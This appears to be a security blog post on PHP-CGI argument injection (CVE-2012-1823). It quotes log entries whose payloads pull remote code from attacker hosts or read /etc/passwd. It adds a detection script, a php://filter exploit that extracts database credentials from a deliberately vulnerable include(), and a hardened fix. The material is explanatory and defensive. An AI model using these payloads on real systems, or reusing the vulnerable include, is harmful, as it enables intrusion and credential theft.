thaicosmic.com

Movies

Thursday, 5 February 2015 (B.E. 2558)

Last hack

======================================================================
"POST /ascriptname.php?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 82 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.04 Chromium/15.0.871.0 Chrome/15.0.871.0 Safari/535.2"

"POST /downloads/rytwi.php HTTP/1.1" 200 13 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"

======================================================================
"POST /index.php/topic/comments/have-you-ever/?-d+allow_url_include=1+-d+auto_prepend_file=php://input HTTP/1.1" 200 115 http://www.domain.com "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; Zune 4.7)" "-"

"POST /error/lmqtrfy.php HTTP/1.1" 200 25 http://www.domain.com "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.813.0 Safari/535.1" "-"

======================================================================
/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dhttp://chetlemon.com/upload.txt

======================================================================
http://naughtymanila.com/phppath/php?-d+allow_url_include%3d1+-d+safe_mode%3d0+-d+suhosin.simulation%3d1+-d+disable_functions%3d''+-d+open_basedir%3dnone+-d+auto_prepend_file%3dhttp://blackhole.hostenko.com/1.txt+-n

======================================================================
A further variant of the same injection, shown here with the URL-encoding removed (an unprintable byte that did not survive copying, rendered as �, follows /etc/passwd):

http://my_ip/?-d allow_url_include=On+-d auto_prepend_file=../../../../../../../../../../../../etc/passwd� -n

?-d allow_url_include=On: the attacker is injecting an extra command-line option into the php-cgi call. When a query string contains no unencoded '=', a CGI web server splits it on '+' and passes the pieces to the CGI program as arguments (RFC 3875), and php-cgi before the May 2012 fixes (5.3.12/5.4.2, completed in 5.3.13/5.4.3) accepted them as its own options; this is CVE-2012-1823, and it is why the live log entries above encode '=' as %3d. The -d option sets an INI directive for that one request:

$ php-cgi -h
Usage: php [-q] [-h] [-s] [-v] [-i] [-f <file>]
       php <file> [args...]
  -d foo[=bar]     Define INI entry foo with value 'bar'
+-d auto_prepend_file=../../../../../../../../../../../../etc/passwd� -n: then make php-cgi include that file before the requested script runs. Why a path-traversal target is used here instead of php://input or a remote file, as in the entries above, is not obvious; /etc/passwd contains no PHP, so auto_prepend_file simply includes it and everything outside <?php tags is written into the response, which turns the request into a file-disclosure probe that also confirms the injection works.

-n at the end makes php-cgi ignore php.ini, so a hardening setting there such as allow_url_include=Off no longer applies:

$ php-cgi -h
Usage: php [-q] [-h] [-s] [-v] [-i] [-f <file>]
       php <file> [args...]
  -n               No php.ini file will be used
PS: Only PHP executed as a plain CGI program (php-cgi under Apache mod_cgi or a ScriptAlias) is exposed to this; mod_php and FastCGI/php-fpm setups never see the query string as argv. If you do run php-cgi, upgrade past the May 2012 fix, or have the web server reject query strings that begin with '-' and contain no '='.
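To turn the entries above into a check that can run over a whole access log, here is an added example (mine, not part of the original post): a PHP command-line script that parses Apache combined-format lines, rebuilds the argv a CGI server would hand to php-cgi, flags the -d/-n/-s options, and also reports a later 200 to a POST on a .php path from the same client, which is how the dropped shell shows up in the first two entries. The log lines embedded in it are constructed from the entries quoted above, with made-up client addresses, timestamps and shortened user agents.

```php
<?php
// Added example, not from the original post: detect PHP-CGI argument
// injection (the CVE-2012-1823 pattern) in Apache combined-format access logs.
// The four log lines below are constructed from the entries quoted above,
// with made-up client addresses, timestamps and shortened user agents.

$sampleLog = <<<'LOG'
1.2.3.4 - - [05/Feb/2015:10:00:01 +0700] "POST /ascriptname.php?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 82 "-" "Mozilla/5.0"
1.2.3.4 - - [05/Feb/2015:10:00:02 +0700] "POST /downloads/rytwi.php HTTP/1.1" 200 13 "-" "Mozilla/5.0"
5.6.7.8 - - [05/Feb/2015:11:00:00 +0700] "GET /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dhttp://chetlemon.com/upload.txt HTTP/1.1" 404 210 "-" "Mozilla/5.0"
9.9.9.9 - - [05/Feb/2015:12:00:00 +0700] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
LOG;

// INI directives that turn argv injection into code execution or switch protections off.
const DANGEROUS_INI = [
    'auto_prepend_file', 'auto_append_file', 'allow_url_include', 'allow_url_fopen',
    'safe_mode', 'disable_functions', 'open_basedir', 'suhosin.simulation',
];

/**
 * Rebuild the argv a CGI server passes to php-cgi. Per RFC 3875 the query
 * string becomes command-line arguments only when it has no unencoded '=';
 * it is then split on '+' and each piece is URL-decoded. That is why the
 * attackers above write %3d instead of '='.
 */
function cgiArgvFromQuery(string $query): array
{
    if ($query === '' || strpos($query, '=') !== false) {
        return [];
    }
    return array_map('rawurldecode', explode('+', $query));
}

/** "name=value" -> finding text when the INI name is one we care about, else null. */
function iniFinding(string $spec): ?string
{
    [$name, $value] = array_pad(explode('=', $spec, 2), 2, '');
    return in_array($name, DANGEROUS_INI, true) ? "-d $name=$value" : null;
}

/** Walk the argv list and collect the options an attacker would use. */
function analyseArgv(array $argv): array
{
    $findings = [];
    for ($i = 0, $n = count($argv); $i < $n; $i++) {
        $arg = $argv[$i];
        if ($arg === '-n') {
            $findings[] = '-n (php.ini ignored)';
        } elseif ($arg === '-s') {
            $findings[] = '-s (script source disclosure)';
        } elseif ($arg === '-d' && $i + 1 < $n) {
            $f = iniFinding($argv[++$i]);          // "-d name=value"
            if ($f !== null) { $findings[] = $f; }
        } elseif (strlen($arg) > 2 && substr($arg, 0, 2) === '-d') {
            $f = iniFinding(substr($arg, 2));      // "-dname=value"
            if ($f !== null) { $findings[] = $f; }
        }
    }
    return $findings;
}

/**
 * Scan log text and return one alert string per suspicious request. A 200 to a
 * POST on a .php path from a client that already attempted injection is reported
 * too, since that is how the dropped shell shows up in the entries above.
 */
function scanLog(string $log): array
{
    $alerts = [];
    $suspects = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) /', $line, $m)) {
            continue;                                   // not combined/common log format
        }
        [$ip, $method, $target, $status] = array_slice($m, 1);
        [$path, $query] = array_pad(explode('?', $target, 2), 2, '');
        $findings = analyseArgv(cgiArgvFromQuery($query));
        if ($findings !== []) {
            $suspects[$ip] = true;
            $alerts[] = "$ip $method $path: php-cgi argument injection: " . implode('; ', $findings);
        } elseif ($method === 'POST' && $status === '200' && isset($suspects[$ip])
            && substr($path, -4) === '.php') {
            $alerts[] = "$ip POST $path returned 200 after an injection attempt: possible dropped web shell";
        }
    }
    return $alerts;
}

foreach (scanLog($sampleLog) as $alert) {
    echo $alert, PHP_EOL;
}
```

Run it with `php` on the command line; it reports the first three constructed lines and stays quiet on the ordinary `?page=home` request. Note that cgiArgvFromQuery deliberately mirrors the server rule, so an entry like the /index.php/topic/... one above, which carries a literal '=', is treated as not reaching php-cgi as argv; if you want to count scanner noise as well, drop the strpos check and alert on any query that starts with '-'. Swap $sampleLog for file_get_contents() of the real log to use it in anger.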

========================================================================
hackconndb.php
<?php
    // Client side of the demo: ask the vulnerable script on port 82 to include
    // conndb.php through the php://filter wrapper, which hands back the file's
    // source base64-encoded instead of executing it.
    $url = "http://127.0.0.1:82/4_hackconndb.php?urlConfig=php://filter/convert.base64-encode/resource=conndb.php";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $contents = curl_exec($ch);
    if (curl_errno($ch)) {
        echo curl_error($ch), "\n";
        $contents = '';
    }
    curl_close($ch);   // release the handle on both the error and the success path

    if (!is_string($contents) || !strlen($contents)) {
        echo "Failed to get contents.";
        $contents = '';
    }
    // Decode the base64 body and show the recovered source (credentials included);
    // escape it so a stray </textarea> in the file cannot break out of the box.
    echo "<textarea name='source' rows='25' cols='120'>" . htmlspecialchars(base64_decode($contents)) . "</textarea>";
?>
------------------------------------------------------------------------------------------------------------
4_hackconndb.php
<?php
// Deliberately vulnerable: whatever arrives in urlConfig (a path, ../ traversal,
// or any stream wrapper such as php://filter) goes straight into include().
include($_REQUEST["urlConfig"]);
?>
========================================================================
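The include in 4_hackconndb.php above is the whole bug: whatever arrives in urlConfig is handed to include(), so php://filter/convert.base64-encode/resource=conndb.php returns the source of conndb.php (database credentials included) base64-encoded instead of running it, and ../ paths work the same way. Setting allow_url_include=Off blocks http:// targets but not php://filter, which is a local wrapper. As an added example (mine, not part of the original post), here is a hardened replacement that maps a short key to a file inside a fixed directory and refuses everything else; the directory name, the key names and the config file names are assumptions.

```php
<?php
// Added example, not from the original post: hardened replacement for
//     include($_REQUEST["urlConfig"]);
// The caller may only choose among known keys; the resolved path is checked
// with realpath() so symlinks and ../ cannot escape the config directory.
// $configDir, the keys and the file names are assumptions for this example.

$configDir = __DIR__ . '/config';          // assumed location of the include files
$allowedConfigs = [                         // assumed key -> file map
    'db'   => 'conndb.php',
    'mail' => 'mail.php',
];

/**
 * Resolve a user-supplied config key to an absolute path, or null.
 * Unknown keys (which is what php://..., http://... and ../... become) are
 * rejected before any filesystem access; the allow-listed file must then
 * still resolve to a location inside $baseDir.
 */
function resolveConfig(string $key, array $allowed, string $baseDir): ?string
{
    if (!isset($allowed[$key])) {
        return null;                        // not in the allow list
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $allowed[$key]);
    if ($base === false || $path === false) {
        return null;                        // directory or file does not exist
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                        // resolved outside the config directory
    }
    return $path;
}

$key  = isset($_GET['urlConfig']) ? (string) $_GET['urlConfig'] : '';
$file = resolveConfig($key, $allowedConfigs, $configDir);
if ($file === null) {
    http_response_code(400);
    exit('unknown config');
}
include $file;
```

With this in place the request from hackconndb.php gets a 400 and an empty textarea, because "php://filter/convert.base64-encode/resource=conndb.php" is not a key in $allowedConfigs. The realpath() check is belt and braces for the case where the map itself is later edited to contain a relative path; the allow list is what actually closes the hole. Reading from $_GET rather than $_REQUEST also stops the same parameter being smuggled in through a cookie or POST body.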